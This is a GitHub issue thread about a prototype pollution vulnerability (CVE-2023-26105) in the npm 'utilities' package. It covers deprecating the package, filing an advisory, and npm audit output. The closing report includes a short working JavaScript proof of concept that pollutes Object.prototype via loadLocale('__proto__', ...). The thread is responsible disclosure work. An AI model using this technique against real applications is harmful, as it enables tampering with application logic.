Open · lelecolacola123 opened this issue 1 year ago
@mde Snyk sent us an email regarding this vulnerability, so could you check your mailbox? I replied to the email on Feb. 25th at 8:00pm UTC.
If you no longer have time to maintain this package, how about deprecating it for now?
I checked the dependents on npm and there were no actively maintained packages, so I believe the impact is minimal. https://www.npmjs.com/browse/depended/utilities
I found I have permission to control this package on npm, so if you agree with deprecating the utilities package, I can deprecate it on your behalf.
In addition, Snyk will assign a CVE for this vulnerability, and I guess it will be reported by npm audit soon.
@phanect, that would be much appreciated. Thank you very much!
@mde Thanks for the reply. So you mean I can deprecate the package?
Yes, please. And thank you very much!
OK, I will deprecate it later. Thanks for the confirmation 🙇
🫡🫡🫡🫡
I have deprecated this utilities package on npm.
I am keeping this issue open so that you can resolve this vulnerability in case you want to restart maintenance of utilities in the future.
@mde I think we should also flag this package on npmjs.com so that npm audit can tell users this package is vulnerable.
I asked npm support how to register the vulnerability on npmjs.com, and they told me that we can register it by creating a security advisory on GitHub. https://docs.github.com/en/code-security/security-advisories/repository-security-advisories/creating-a-repository-security-advisory
Can you create a security advisory? Snyk has already reserved the CVE identifier CVE-2023-26105, so please associate that CVE identifier when you create the security advisory.
Or, if you temporarily give me permission on this repository, I will publish a security advisory on your behalf. (However, the Admin role is required.)
@mde I found I could send an update request to GitHub's vulnerability database myself from the link for CVE-2023-26105 (https://github.com/advisories/GHSA-wxfj-84xf-7gxv), so I have sent the request (https://github.com/github/advisory-database/pull/1751). Therefore, you no longer have to write a security advisory.
It has been published, and now npm audit warns of the vulnerability.
$ cat package.json
{
  "name": "test",
  "version": "1.0.0",
  "license": "UNLICENSED",
  "dependencies": {
    "utilities": "latest"
  }
}
$ npm install
npm WARN deprecated utilities@1.0.6: This package is no longer maintained and vulnerability exists.
added 1 package, and audited 2 packages in 394ms
1 high severity vulnerability
Some issues need review, and may require choosing a different dependency.
Run `npm audit` for details.
$ npm audit
# npm audit report

utilities  *
Severity: high
mde utilities contains Prototype Pollution - https://github.com/advisories/GHSA-wxfj-84xf-7gxv
No fix available
node_modules/utilities

1 high severity vulnerability

Some issues need review, and may require choosing a different dependency.
I think that's all for the response to this vulnerability.
Thank you!
Hi, there's a prototype pollution vulnerability in the function _mix() in utilities/lib/core.js. The risk is located here:
https://github.com/mde/utilities/blob/ba6be1fd1abe7541f5965c0bf831f127e42da815/lib/core.js#L65
https://github.com/mde/utilities/blob/ba6be1fd1abe7541f5965c0bf831f127e42da815/lib/core.js#L41
And the PoC is:

```javascript
var utilities = require("utilities");

// Attacker-controlled locale data that will be merged into the locale table
var bad_objects = { test: "123" };

// A fresh object has no "test" property before the call
console.log("Before: " + {}.test);

// The locale name "__proto__" makes the merge in _mix() write into
// Object.prototype, so every object afterwards inherits "test"
utilities.i18n.loadLocale("__proto__", bad_objects, {}, true);

console.log("After: " + {}.test);
```

In the file i18n.js there is a function called loadLocale, which calls the mixin function in utilities/lib/core.js, and that calls the _mix function at line 22; in the _mix function, where the objects are merged, prototype pollution results.
More information about the vulnerability: https://github.com/HoLyVieR/prototype-pollution-nsec18/blob/master/paper/JavaScript_prototype_pollution_attack_in_NodeJS.pdf